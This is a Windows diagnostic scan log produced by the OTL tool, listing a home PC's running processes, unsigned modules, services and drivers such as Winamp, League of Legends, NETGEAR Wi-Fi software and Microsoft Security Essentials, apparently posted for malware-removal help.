Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2013.06.11 15:17:11 | 000,602,112 | ---- | M] (OldTimer Tools) -- d:\Users\Dani\Desktop\OTL.exe
PRC - [2013.06.03 19:14:09 | 000,144,384 | ---- | M] (Adobe Systems Inc.) -- D:\Spiele\League of Legends\RADS\projects\lol_air_client\releases\0.0.1.26\deploy\LolClient.exe
PRC - [2013.05.23 18:35:24 | 000,920,472 | ---- | M] (Mozilla Corporation) -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe
PRC - [2013.05.14 20:09:31 | 001,855,880 | ---- | M] (Adobe Systems, Inc.) -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_11_7_700_202.exe
PRC - [2013.05.11 12:37:26 | 000,065,640 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2013.04.16 16:10:44 | 019,662,744 | ---- | M] (Google) -- C:\Program Files (x86)\Google\Drive\googledrivesync.exe
PRC - [2013.01.18 09:14:20 | 000,383,264 | ---- | M] (NVIDIA Corporation) -- C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
PRC - [2013.01.15 01:00:00 | 002,578,312 | ---- | M] (Cerulean Studios) -- C:\Program Files (x86)\Trillian\trillian.exe
PRC - [2012.06.28 17:41:58 | 002,206,888 | ---- | M] (Nullsoft, Inc.) -- C:\Program Files (x86)\Winamp\winamp.exe
PRC - [2012.05.24 14:15:07 | 002,686,976 | ---- | M] () -- D:\Spiele\League of Legends\RADS\projects\lol_launcher\releases\0.0.0.164\deploy\LoLLauncher.exe
PRC - [2012.05.15 15:17:26 | 000,363,800 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
PRC - [2012.05.15 15:17:22 | 000,277,784 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
PRC - [2012.05.10 15:20:34 | 000,165,144 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
PRC - [2012.03.27 01:14:28 | 000,291,608 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
PRC - [2011.11.22 16:31:38 | 000,374,112 | ---- | M] (Ralink Technology, Corp.) -- C:\Program Files (x86)\Belkin\F9L1103\v1\Common\RaRegistry.exe
PRC - [2011.10.29 01:47:48 | 001,294,336 | ---- | M] () -- D:\Spiele\League of Legends\RADS\system\rads_user_kernel.exe
PRC - [2010.06.14 14:56:02 | 004,573,664 | ---- | M] () -- C:\Program Files (x86)\NETGEAR\WNA1100\WNA1100.exe
PRC - [2010.03.22 20:07:22 | 000,268,768 | ---- | M] () -- C:\Program Files (x86)\NETGEAR\WNA1100\WifiSvc.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2013.06.11 15:13:39 | 001,175,040 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\wx._core_.pyd
MOD - [2013.06.11 15:13:39 | 001,153,024 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\_ssl.pyd
MOD - [2013.06.11 15:13:39 | 001,022,416 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\windows._cacheinvalidation.pyd
MOD - [2013.06.11 15:13:39 | 000,811,008 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\wx._windows_.pyd
MOD - [2013.06.11 15:13:39 | 000,805,888 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\wx._gdi_.pyd
MOD - [2013.06.11 15:13:39 | 000,735,232 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\wx._misc_.pyd
MOD - [2013.06.11 15:13:39 | 000,711,680 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\_hashlib.pyd
MOD - [2013.06.11 15:13:39 | 000,557,056 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\pysqlite2._sqlite.pyd
MOD - [2013.06.11 15:13:39 | 000,364,544 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\pythoncom27.dll
MOD - [2013.06.11 15:13:39 | 000,320,512 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32com.shell.shell.pyd
MOD - [2013.06.11 15:13:39 | 000,128,512 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\_elementtree.pyd
MOD - [2013.06.11 15:13:39 | 000,122,368 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\wx._wizard.pyd
MOD - [2013.06.11 15:13:39 | 000,119,808 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32file.pyd
MOD - [2013.06.11 15:13:39 | 000,110,080 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\pywintypes27.dll
MOD - [2013.06.11 15:13:39 | 000,108,544 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32security.pyd
MOD - [2013.06.11 15:13:39 | 000,098,816 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32api.pyd
MOD - [2013.06.11 15:13:39 | 000,087,040 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\_ctypes.pyd
MOD - [2013.06.11 15:13:39 | 000,070,656 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\wx._html2.pyd
MOD - [2013.06.11 15:13:39 | 000,044,032 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\_socket.pyd
MOD - [2013.06.11 15:13:39 | 000,038,912 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32inet.pyd
MOD - [2013.06.11 15:13:39 | 000,035,840 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32process.pyd
MOD - [2013.06.11 15:13:39 | 000,026,624 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\_multiprocessing.pyd
MOD - [2013.06.11 15:13:39 | 000,025,600 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32pdh.pyd
MOD - [2013.06.11 15:13:39 | 000,022,528 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32ts.pyd
MOD - [2013.06.11 15:13:39 | 000,017,408 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32profile.pyd
MOD - [2013.06.11 15:13:39 | 000,011,264 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32crypt.pyd
MOD - [2013.06.11 15:13:38 | 001,062,400 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\wx._controls_.pyd
MOD - [2013.06.11 15:13:38 | 000,686,080 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\unicodedata.pyd
MOD - [2013.06.11 15:13:38 | 000,127,488 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\pyexpat.pyd
MOD - [2013.06.11 15:13:38 | 000,018,432 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\win32event.pyd
MOD - [2013.06.11 15:13:38 | 000,010,240 | ---- | M] () -- d:\Users\Dani\AppData\Local\Temp\_MEI32922\select.pyd
MOD - [2013.05.23 18:35:10 | 003,128,728 | ---- | M] () -- C:\Program Files (x86)\Mozilla Firefox\mozjs.dll
MOD - [2013.05.14 20:09:30 | 016,033,160 | ---- | M] () -- C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_202.dll
MOD - [2013.03.02 20:38:20 | 000,623,616 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\jnetlib.w5s
MOD - [2013.03.02 20:38:20 | 000,154,624 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\jpeg.w5s
MOD - [2013.03.02 20:38:20 | 000,091,136 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\xml.w5s
MOD - [2013.03.02 20:38:20 | 000,087,552 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\png.w5s
MOD - [2013.03.02 20:38:20 | 000,084,480 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\playlist.w5s
MOD - [2013.03.02 20:38:20 | 000,083,968 | ---- | M] () -- C:\Program Files (x86)\Winamp\tataki.dll
MOD - [2013.03.02 20:38:20 | 000,064,512 | ---- | M] () -- C:\Program Files (x86)\Winamp\zlib.dll
MOD - [2013.03.02 20:38:20 | 000,035,328 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\timer.w5s
MOD - [2013.03.02 20:38:20 | 000,021,504 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\tagz.w5s
MOD - [2013.03.02 20:38:20 | 000,013,824 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\primo.w5s
MOD - [2013.03.02 20:38:19 | 001,737,728 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\gen_ff.dll
MOD - [2013.03.02 20:38:19 | 000,417,280 | ---- | M] () -- C:\Program Files (x86)\Winamp\nsutil.dll
MOD - [2013.03.02 20:38:19 | 000,340,992 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\freeform\wacs\freetype\freetype.wac
MOD - [2013.03.02 20:38:19 | 000,318,976 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\gen_ml.dll
MOD - [2013.03.02 20:38:19 | 000,313,344 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_wm.dll
MOD - [2013.03.02 20:38:19 | 000,294,912 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_local.dll
MOD - [2013.03.02 20:38:19 | 000,290,816 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_mp3.dll
MOD - [2013.03.02 20:38:19 | 000,253,440 | ---- | M] () -- C:\Program Files (x86)\Winamp\libsndfile.dll
MOD - [2013.03.02 20:38:19 | 000,253,440 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_vorbis.dll
MOD - [2013.03.02 20:38:19 | 000,249,856 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_devices.dll
MOD - [2013.03.02 20:38:19 | 000,240,640 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_pmp.dll
MOD - [2013.03.02 20:38:19 | 000,201,728 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_disc.dll
MOD - [2013.03.02 20:38:19 | 000,185,344 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\gen_jumpex.dll
MOD - [2013.03.02 20:38:19 | 000,174,080 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\auth.w5s
MOD - [2013.03.02 20:38:19 | 000,164,864 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_mod.dll
MOD - [2013.03.02 20:38:19 | 000,124,928 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_online.dll
MOD - [2013.03.02 20:38:19 | 000,118,272 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\pmp_p4s.dll
MOD - [2013.03.02 20:38:19 | 000,113,664 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\pmp_wifi.dll
MOD - [2013.03.02 20:38:19 | 000,109,568 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_midi.dll
MOD - [2013.03.02 20:38:19 | 000,102,400 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_cdda.dll
MOD - [2013.03.02 20:38:19 | 000,084,480 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_playlists.dll
MOD - [2013.03.02 20:38:19 | 000,083,456 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_plg.dll
MOD - [2013.03.02 20:38:19 | 000,078,848 | ---- | M] () -- C:\Program Files (x86)\Winamp\nde.dll
MOD - [2013.03.02 20:38:19 | 000,075,264 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_nsv.dll
MOD - [2013.03.02 20:38:19 | 000,072,192 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_dshow.dll
MOD - [2013.03.02 20:38:19 | 000,068,608 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_avi.dll
MOD - [2013.03.02 20:38:19 | 000,061,440 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_flac.dll
MOD - [2013.03.02 20:38:19 | 000,060,928 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\pmp_android.dll
MOD - [2013.03.02 20:38:19 | 000,057,344 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_impex.dll
MOD - [2013.03.02 20:38:19 | 000,057,344 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\gen_orgler.dll
MOD - [2013.03.02 20:38:19 | 000,053,760 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\pmp_usb.dll
MOD - [2013.03.02 20:38:19 | 000,052,736 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_mp4.dll
MOD - [2013.03.02 20:38:19 | 000,052,224 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\out_ds.dll
MOD - [2013.03.02 20:38:19 | 000,052,224 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_history.dll
MOD - [2013.03.02 20:38:19 | 000,049,152 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_mkv.dll
MOD - [2013.03.02 20:38:19 | 000,044,544 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\devices.w5s
MOD - [2013.03.02 20:38:19 | 000,043,008 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_flv.dll
MOD - [2013.03.02 20:38:19 | 000,033,792 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_rg.dll
MOD - [2013.03.02 20:38:19 | 000,032,256 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_transcode.dll
MOD - [2013.03.02 20:38:19 | 000,028,672 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_bookmarks.dll
MOD - [2013.03.02 20:38:19 | 000,028,672 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_autotag.dll
MOD - [2013.03.02 20:38:19 | 000,028,160 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\gen_hotkeys.dll
MOD - [2013.03.02 20:38:19 | 000,025,600 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\gen_tray.dll
MOD - [2013.03.02 20:38:19 | 000,023,552 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_swf.dll
MOD - [2013.03.02 20:38:19 | 000,023,552 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\albumart.w5s
MOD - [2013.03.02 20:38:19 | 000,022,528 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\out_disk.dll
MOD - [2013.03.02 20:38:19 | 000,020,480 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\pmp_njb.dll
MOD - [2013.03.02 20:38:19 | 000,019,456 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\gif.w5s
MOD - [2013.03.02 20:38:19 | 000,019,456 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\bmp.w5s
MOD - [2013.03.02 20:38:19 | 000,018,432 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\out_wave.dll
MOD - [2013.03.02 20:38:19 | 000,016,896 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_wave.dll
MOD - [2013.03.02 20:38:19 | 000,016,896 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\dlmgr.w5s
MOD - [2013.03.02 20:38:19 | 000,016,384 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\gracenote.w5s
MOD - [2013.03.02 20:38:19 | 000,014,336 | ---- | M] () -- C:\Program Files (x86)\Winamp\System\filereader.w5s
MOD - [2013.03.02 20:38:19 | 000,007,168 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\in_linein.dll
MOD - [2013.01.15 01:00:00 | 000,187,392 | ---- | M] () -- C:\Program Files (x86)\Trillian\libpng15.dll
MOD - [2013.01.15 01:00:00 | 000,065,536 | ---- | M] () -- C:\Program Files (x86)\Trillian\libungif.dll
MOD - [2013.01.15 01:00:00 | 000,059,904 | ---- | M] () -- C:\Program Files (x86)\Trillian\zlib1.dll
MOD - [2013.01.15 01:00:00 | 000,010,752 | ---- | M] () -- c:\program files (x86)\trillian\languages\en\buddy.dll
MOD - [2013.01.15 01:00:00 | 000,007,168 | ---- | M] () -- c:\program files (x86)\trillian\languages\en\talk.dll
MOD - [2013.01.15 01:00:00 | 000,006,656 | ---- | M] () -- c:\program files (x86)\trillian\languages\en\trillian.dll
MOD - [2013.01.15 01:00:00 | 000,006,656 | ---- | M] () -- c:\program files (x86)\trillian\languages\en\events.dll
MOD - [2013.01.15 01:00:00 | 000,003,584 | ---- | M] () -- c:\program files (x86)\trillian\languages\en\toolkit.dll
MOD - [2012.05.24 14:15:07 | 002,686,976 | ---- | M] () -- D:\Spiele\League of Legends\RADS\projects\lol_launcher\releases\0.0.0.164\deploy\LoLLauncher.exe
MOD - [2011.10.29 01:47:48 | 001,294,336 | ---- | M] () -- D:\Spiele\League of Legends\RADS\system\rads_user_kernel.exe
MOD - [2010.12.13 12:06:26 | 000,638,976 | ---- | M] () -- C:\Program Files (x86)\Winamp\Plugins\ml_ipod.dll
MOD - [2010.12.13 12:03:34 | 000,069,632 | ---- | M] () -- C:\Program Files (x86)\Winamp\plugins\ml_ipod\ui.dll
MOD - [2010.06.14 14:56:02 | 004,573,664 | ---- | M] () -- C:\Program Files (x86)\NETGEAR\WNA1100\WNA1100.exe
MOD - [2009.08.28 16:50:18 | 000,282,624 | ---- | M] () -- C:\Program Files (x86)\NETGEAR\WNA1100\WifiSvcLib.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2009.07.14 03:40:01 | 000,193,536 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\appmgmts.dll -- (AppMgmt)
SRV - [2013.06.05 21:29:08 | 000,543,656 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2013.05.23 18:35:23 | 000,117,144 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2013.05.19 17:09:43 | 000,053,248 | ---- | M] () [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\BattlEye\BEService.exe -- (BEService)
SRV - [2013.05.14 20:09:31 | 000,256,904 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2013.05.11 12:37:26 | 000,065,640 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2013.03.01 09:45:15 | 001,038,088 | ---- | M] (Acresso Software Inc.) [On_Demand | Stopped] -- C:\Programme\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe -- (FLEXnet Licensing Service 64)
SRV - [2013.03.01 09:43:53 | 000,655,624 | ---- | M] (Acresso Software Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe -- (FLEXnet Licensing Service)
SRV - [2013.01.27 12:34:32 | 000,379,360 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Programme\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV - [2013.01.27 12:34:32 | 000,022,056 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Programme\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV - [2013.01.18 09:14:20 | 000,383,264 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe -- (Stereo Service)
SRV - [2012.12.29 12:34:47 | 001,260,472 | ---- | M] (NVIDIA Corporation) [Auto | Stopped] -- C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe -- (nvUpdatusService)
SRV - [2012.07.25 18:58:26 | 000,126,976 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Windows Kits\8.0\Testing\Runtimes\TAEF\Wex.Services.exe -- (Te.Service)
SRV - [2012.07.25 18:13:16 | 000,139,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Windows Kits\8.0\App Certification Kit\fussvc.exe -- (fussvc)
SRV - [2012.07.09 00:40:10 | 000,104,912 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2012.05.15 15:17:26 | 000,363,800 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2012.05.15 15:17:22 | 000,277,784 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2012.05.10 15:20:34 | 000,165,144 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe -- (jhi_service)
SRV - [2012.04.20 14:16:12 | 000,635,104 | ---- | M] (Intel(R) Corporation) [Auto | Running] -- C:\Programme\Intel\iCLS Client\HeciServer.exe -- (Intel(R)
SRV - [2012.02.11 08:55:04 | 000,129,624 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Programme\Microsoft SQL Server\90\Shared\sqlwriter.exe -- (SQLWriter)
SRV - [2011.11.22 16:31:38 | 000,451,936 | ---- | M] (Ralink Technology, Corp.) [Auto | Running] -- C:\Program Files (x86)\Belkin\F9L1103\v1\Common\RaRegistry64.exe -- (RalinkRegistryWriter64)
SRV - [2011.11.22 16:31:38 | 000,374,112 | ---- | M] (Ralink Technology, Corp.) [Auto | Running] -- C:\Program Files (x86)\Belkin\F9L1103\v1\Common\RaRegistry.exe -- (RalinkRegistryWriter)
SRV - [2011.03.21 17:19:16 | 001,845,248 | ---- | M] (Locktime Software) [Auto | Running] -- C:\Programme\NetLimiter 3\nlsvc.exe -- (nlsvc)
SRV - [2010.03.22 20:07:22 | 000,268,768 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\NETGEAR\WNA1100\WifiSvc.exe -- (WSWNA1100)
SRV - [2010.03.22 20:05:40 | 000,960,992 | ---- | M] (Atheros Communications, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\NETGEAR\WNA1100\jswpsapi.exe -- (jswpsapi)
SRV - [2009.06.10 23:23:09 | 000,066,384 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2013.04.05 20:27:19 | 000,564,824 | ---- | M] (Duplex Secure Ltd.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\sptd.sys -- (sptd)
DRV:64bit: - [2013.01.20 16:59:04 | 000,130,008 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:64bit: - [2012.12.13 14:50:36 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:64bit: - [2012.08.23 16:10:20 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:64bit: - [2012.08.23 16:08:26 | 000,030,208 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2012.08.23 16:07:35 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2012.08.21 19:14:02 | 000,772,224 | ---- | M] (Line 6) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\L6GX64.sys -- (L6GX)
DRV:64bit: - [2012.08.21 14:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:64bit: - [2012.07.17 19:12:08 | 000,062,784 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:64bit: - [2012.07.03 17:25:16 | 000,189,288 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nvhda64v.sys -- (NVHDA)
DRV:64bit: - [2012.05.14 08:12:30 | 000,096,896 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\AtihdW76.sys -- (AtiHDAudioService)
DRV:64bit: - [2012.04.25 09:07:18 | 000,104,560 | ---- | M] (Qualcomm Atheros Co., Ltd.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\L1C62x64.sys -- (L1C)
DRV:64bit: - [2012.03.27 01:13:20 | 000,789,272 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iusb3xhc.sys -- (iusb3xhc)
DRV:64bit: - [2012.03.27 01:13:20 | 000,356,632 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iusb3hub.sys -- (iusb3hub)
DRV:64bit: - [2012.03.27 01:13:18 | 000,019,224 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iusb3hcs.sys -- (iusb3hcs)
DRV:64bit: - [2012.03.01 08:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2011.12.16 21:17:40 | 001,675,840 | ---- | M] (Ralink Technology Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netr28ux.sys -- (netr28ux)
DRV:64bit: - [2011.03.21 17:44:30 | 000,033,416 | ---- | M] (Locktime Software) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\nlndis.sys -- (NLNdisPT)
DRV:64bit: - [2011.03.21 17:44:30 | 000,033,416 | ---- | M] (Locktime Software) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nlndis.sys -- (NLNdisMP)
DRV:64bit: - [2011.03.11 08:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011.03.11 08:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2010.11.21 05:23:48 | 000,071,168 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:64bit: - [2010.11.21 05:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010.03.09 16:33:10 | 001,849,856 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\athurx.sys -- (athur)
DRV:64bit: - [2009.07.14 03:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009.07.14 03:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009.07.14 03:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009.06.10 22:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009.06.10 22:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
